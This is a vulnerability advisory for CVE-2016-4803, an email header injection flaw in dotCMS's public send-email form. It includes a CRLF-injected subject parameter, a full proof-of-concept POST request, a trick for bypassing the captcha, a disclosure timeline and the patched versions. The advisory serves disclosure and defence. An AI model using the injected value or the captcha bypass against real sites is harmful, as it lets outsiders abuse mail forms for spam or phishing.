dotCMS Email Header Injection

`Title: CVE-2016-4803 dotCMS - Email Header Injection  
Credit: Elar Lang / https://security.elarlang.eu  
Vulnerability: Email Header Injection  
Vulnerable version: before 3.5 / 3.3.2  
CVE: CVE-2016-4803  
Vendor: dotCMS (http://dotcms.com/)  
  
  
# Description  
dotCMS has an email sending functionality at path /dotCMS/sendEmail/  
Some parameters are vulnerable to Email Header Injection.  
  
  
# Preconditions  
There is no pre-condition on authentication or on authorization to  
access this functionality.  
  
If captcha is required for the web page, then the only precondition  
would be captcha. However, captcha is renewed only when you access the  
captcha image - in other words, you can load it once and manually set  
the correct value. After this step the "captcha effect" is bypassed.  
  
  
# Proof-of-Concept  
Proof-of-Concept is made on dotCMS demo site with dotCMS version 3.2.1  
on 7th of December 2015.  
  
## Value for subject (%0D%0A is for \r\n):  
subject=subject%0D%0AX-PoC-of-New-Line%3A+True  
  
  
## Proof-of-Concept POST request:  
<code>  
POST /dotCMS/sendEmail HTTP/1.1  
Host: demo2.dotcms.com  
...  
Cookie: _JSESSIONID=998ADA19C99505E75DC6D27A5E84D...; ...  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 218  
  
from=myemail&to=youremail&subject=subject%0D%0AX-PoC-of-New-Line%3A+True&returnUrl=%2F1&invalidCaptchaReturnUrl=%2F2&useCaptcha=true&captcha=hwxc5&comments=some+content&send=Send  
</code>  
  
  
## Received email source:  
<code>  
Message-ID: <[email protected]>  
From: myemail  
To: youremail  
Subject: subject  
X-PoC-of-New-Line: True  
MIME-Version: 1.0  
Content-Type: multipart/alternative;  
boundary="----=_Part_4_698773753.1449476889786"  
X-RecipientId: null  
Date: Mon, 7 Dec 2015 03:28:09 -0500 (EST)  
  
------=_Part_4_698773753.1449476889786  
Content-Type: text/plain; charset=us-ascii  
Content-Transfer-Encoding: 7bit  
  
... removed ...  
</code>  
  
  
## Result  
  
>From the received email source, it is visible that the subject value  
created 2 different lines:  
<code>  
Subject: subject  
X-PoC-of-New-Line: True  
</code>  
  
Proof-of-Concept on how to send a multipart email with an attachment  
and a more detailed description is available at:  
https://security.elarlang.eu/cve-2016-4803-dotcms-email-header-injection-vulnerability-full-disclosure.html  
  
  
# Vulnerability Disclosure Timeline  
  
2015-12-04 .. 07 | me | detected vulnerability, wrote Proof-of-Concept  
2015-12-07 | me > dotCMS | sent a letter with detailed description of  
email header injection and some related vulnerabilities  
2015-12-14 | me > dotCMS | sent another letter with SQL injections  
vulnerabilities and asked feedback about "email header injection"  
vulnerabilities  
2015-12-14 | dotCMS > me | they were going to review my emails and  
asked to resend "email header injection" description  
2015-12-14 | me > dotCMS | I resent "email header injection" description  
2015-12-14 | dotCMS > me | they were planning fixes in upcoming  
release, estimated to beginning of 2016. They thanked and wrote  
"security is something we take seriously"  
  
2016-04-07 | me > dotCMS | 5 months since first report, what is the  
situation with reported vulnerabilities?  
2016-04-07 | dotCMS | commit in GitHub | "fixes #8840 sort by  
sanitizing and email header injection #8841"  
2016-04-07 | dotCMS > me | email header injection will be fixed in  
3.5, which is estimated to be out in mid-April  
  
2016-04-19 | dotCMS | dotCMS version 3.5 release  
2016-05-09 | me > dotCMS | asked confirmation and version numbers  
about fixes for CVE and Full Disclosure  
2016-05-10 | dotCMS > me | email header injection is fixed in versions  
3.5 and 3.3.2.  
2016-05-10 | dotCMS | dotCMS version 3.3.2 release  
2016-05-24 | me | Full Disclosure on security.elarlang.eu  
  
  
# Fixes  
Update dotCMS at least to version 3.5 or 3.3.2.  
  
https://dotcms.com/docs/latest/change-log#release-3.5  
https://dotcms.com/docs/latest/change-log#release-3.3.2  
  
--  
Elar Lang  
Blog @ https://security.elarlang.eu  
Pentester, lecturer @ http://www.clarifiedsecurity.com  
  
  
`